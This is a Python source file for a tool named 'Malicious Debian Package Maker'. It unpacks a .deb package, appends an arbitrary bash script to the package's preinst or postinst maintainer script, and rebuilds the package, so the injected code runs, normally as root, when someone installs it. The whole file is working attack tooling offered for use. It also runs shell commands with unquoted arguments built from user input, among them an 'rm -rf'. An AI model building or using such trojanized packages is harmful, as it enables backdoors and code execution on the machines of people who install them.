#!/usr/bin/python3
'''
Tool Name :: Malicious Debian Package Maker
Author :: Padsala Tushal
Date :: 24 Oct 2021
'''
import os
import argparse
import sys
from colorama import Fore, Style
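def get_arguments():
    """Parse the command line and return the populated namespace.

    Two options are expected: ``-p`` (stored as ``args.deb``) and ``-s``
    (stored as ``args.bash``). ``-v``/``--version`` prints the version and
    exits via argparse.

    Returns:
        argparse.Namespace: namespace with ``deb`` and ``bash`` set.

    Raises:
        SystemExit: when either ``-p`` or ``-s`` is missing (usage is printed
            first), or when argparse itself rejects the command line.
    """
    parser = argparse.ArgumentParser(
        description='Inject bash script in debian package',
        usage=f'python3 {sys.argv[0]} -p debian_package -s bash_script',
        epilog=f'EXAMPLE - python3 {sys.argv[0]} -p /tmp/file.deb -s /tmp/script.sh',
    )
    parser.add_argument('-v', '--version', action='version', version='1.4',
                        help='show the version of program')
    parser.add_argument('-s', metavar='bash script', dest='bash',
                        help='Enter your bash script path')
    parser.add_argument('-p', metavar='debian package', dest='deb',
                        help='Enter your debian package path')
    args = parser.parse_args()
    # Check the parsed values instead of counting argv tokens: a token count
    # lets "-p a -p b" through with args.bash still None, and rejects the
    # equally valid attached form "-pfile -sfile".
    if args.deb is None or args.bash is None:
        parser.print_usage()
        sys.exit(1)
    return args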
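# Read the two input paths from the command line and validate them before any
# file is touched. Every failure writes a message to stderr and exits with a
# non-zero status so a calling script can tell the run did not happen.
args = get_arguments()
deb = args.deb
bash = args.bash
# The extension must be at the end of the name; a substring test would also
# accept names such as "notes.deb.txt". A missing value is rejected here too.
if not deb or not deb.endswith(".deb"):
    sys.stderr.write("Enter valid debian file\n")
    sys.exit(1)
if not bash or not bash.endswith(".sh"):
    sys.stderr.write("Enter valid bash file\n")
    sys.exit(1)
if not os.path.exists(deb) or not os.path.exists(bash):
    sys.stderr.write("File doesn't exist\n")
    sys.exit(1)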
def extract(file):
    """Unpack the package *file* with ``dpkg-deb -R``.

    The destination is ``/tmp/`` followed by the part of *file* that precedes
    the first ``.deb``. Standard output of the command is redirected to
    ``/tmp/log.txt``; the exit status of the command is not checked.
    """
    # NOTE(review): *file* is interpolated unquoted into a shell command line,
    # so a path containing spaces or shell metacharacters changes the command
    # that actually runs.
    os.system(
        f"dpkg-deb -R {file} /tmp/{file.partition('.deb')[0]} > /tmp/log.txt"
    )
# Directory the package is unpacked into: "/tmp/" plus the text of the -p
# argument that precedes its first ".deb" (the same expression extract() uses).
debpath = f"/tmp/{deb.partition('.deb')[0]}"
# Path of the maintainer script that will be modified; filled in later by
# checkforinjectablefile().
injectablefile = ""
def checkforinjectablefile():
    """Select the maintainer script under ``debpath/DEBIAN`` and record it.

    The result is stored in the module-level ``injectablefile``:

    * ``preinst`` when it exists,
    * otherwise ``postinst`` when it exists,
    * otherwise a new, empty ``preinst`` is created with mode 0o755 and used.

    dpkg executes these maintainer scripts while installing the package,
    normally with root privileges, so they are the part of a .deb that runs
    code on the installing host. A package altered this way no longer matches
    the checksum published in a signed repository index, and its DEBIAN/
    control scripts differ from the upstream copy; both comparisons expose
    the modification.
    """
    global debpath, injectablefile
    preinst_path = debpath+"/DEBIAN/preinst"
    postinst_path = debpath+"/DEBIAN/postinst"

    # preinst takes precedence when both scripts are present.
    if os.path.exists(preinst_path):
        injectablefile = preinst_path
        return
    if os.path.exists(postinst_path):
        injectablefile = postinst_path
        return

    # Neither script exists: create an empty, executable preinst.
    open(preinst_path, 'w+').close()
    os.chmod(preinst_path, 0o755)
    injectablefile = preinst_path
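def read_content(script: str) -> str:
    """Return the whole text of the file at *script*.

    Args:
        script: path of the file to read (opened in text mode).

    Returns:
        The file's contents as a single string.

    Raises:
        OSError: if the file cannot be opened or read.
    """
    # The context manager closes the handle even when read() raises.
    with open(script, 'r') as handle:
        return handle.read()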
# Text of the script given with -s, read once at start-up; main() later passes
# it to embed().
payload = read_content(bash)
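def embed(script: str, payload: str):
    """Append *payload* to the end of the file at *script*.

    Args:
        script: path of the file to extend; created if it does not exist
            (append mode).
        payload: text written after the file's existing content, unchanged.

    Raises:
        OSError: if the file cannot be opened or written.
    """
    # The context manager closes (and flushes) the handle even if write() fails.
    with open(script, 'a') as handle:
        handle.write(payload)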
def build():
    """Repack the unpacked tree with ``dpkg-deb -b``.

    A ``malicious`` directory is created in the current working directory if
    it is not already there, and ``dpkg-deb -b`` is run with ``debpath`` and
    that directory as its two arguments. Standard output goes to
    ``/tmp/log.txt``; the command's exit status is discarded.
    """
    global debpath
    malicious = os.getcwd()+"/malicious"
    already_there = os.path.exists(malicious)
    if not already_there:
        os.mkdir("malicious")
    # NOTE(review): both paths are interpolated unquoted into a shell command.
    os.system(f"dpkg-deb -b {debpath} {malicious} > /tmp/log.txt")
def clean():
    """Delete the unpacked tree at ``debpath`` and the ``/tmp/log.txt`` log.

    The log is removed only if the recursive delete succeeds (``&&``); the
    overall exit status is not checked.
    """
    # NOTE(review): debpath is derived from the -p argument and is placed
    # unquoted after `rm -rf`, so what gets deleted depends entirely on how
    # that argument was spelled.
    os.system(f"rm -rf {debpath} && rm /tmp/log.txt")
def color_print(string: str, color: str, bold=False):
    """Print *string* in the named colour, followed by a style reset.

    Args:
        string: text to print.
        color: one of ``'red'``, ``'blue'``, ``'green'``, ``'yellow'``; any
            other value raises ``KeyError``.
        bold: when true, ``Style.BRIGHT`` is emitted before the colour code.
    """
    palette = {
        'red': Fore.RED,
        'blue': Fore.BLUE,
        'green': Fore.GREEN,
        'yellow': Fore.YELLOW,
    }
    prefix = Style.BRIGHT if bold else ""
    print(prefix + palette[color] + string + Style.RESET_ALL)
def main():
    """Run the five stages in order, printing a coloured banner before each.

    Stages: unpack the package, pick the maintainer script, append the script
    text to it, repack, and delete the working files. None of the stages
    reports failure, so the closing banner is printed unconditionally.
    """
    # The lambdas read the module globals when called, so the embed stage sees
    # the value checkforinjectablefile() stored in `injectablefile`.
    stages = (
        (f'[+]Extracting File from {deb} Package', 'yellow', lambda: extract(deb)),
        ('[+]Checking for Injectable script', 'red', checkforinjectablefile),
        ('[+]Injecting bash scipt', 'green', lambda: embed(injectablefile, payload)),
        ('[+]Building Malicious Package', 'blue', build),
        ('[+]Cleaning Up', 'red', clean),
    )
    for banner, colour, action in stages:
        color_print(banner, colour, True)
        action()
    color_print('[+]Successfully created Malicious Package', 'green', True)
# Runs unconditionally at module load; there is no `if __name__ == "__main__"`
# guard, so importing this file also executes the argument parsing above and
# the whole pipeline.
main()